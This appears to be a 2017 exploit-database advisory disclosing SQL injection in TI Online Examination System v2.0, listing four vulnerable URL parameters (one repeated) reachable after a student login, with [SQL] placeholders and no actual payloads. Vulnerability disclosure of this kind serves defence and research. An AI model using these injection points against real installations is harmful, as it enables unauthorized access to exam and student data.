# # # # # # Exploit Title: TI Online Examination System v2.0 - SQL Injection # Google Dork: N/A # Date: 12.02.2017 # Vendor Homepage: http://textusintentio.com/ # Software Buy: https://codecanyon.net/item/ti-online-examination-system-v2/11248904 # Demo: http://oesv2.textusintentio.com/ # Version: 2.0 # Tested on: Win7 x64, Kali Linux x64 # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Mail : ihsan[@]ihsan[.]net # # # # # # SQL Injection/Exploit : # Login as student user # http://localhost/[PATH]/center/exam_edit.php?p_e_id=[SQL] # http://localhost/[PATH]/center/student_edit.php?s_id=[SQL] # http://localhost/[PATH]/center/edit_notice.php?n_id=[SQL] # http://localhost/[PATH]/center/exam_edit.php?p_e_id=[SQL] # Etc.. # # # # # # Iranian Exploit DataBase = http://IeDb.Ir [2017-02-13]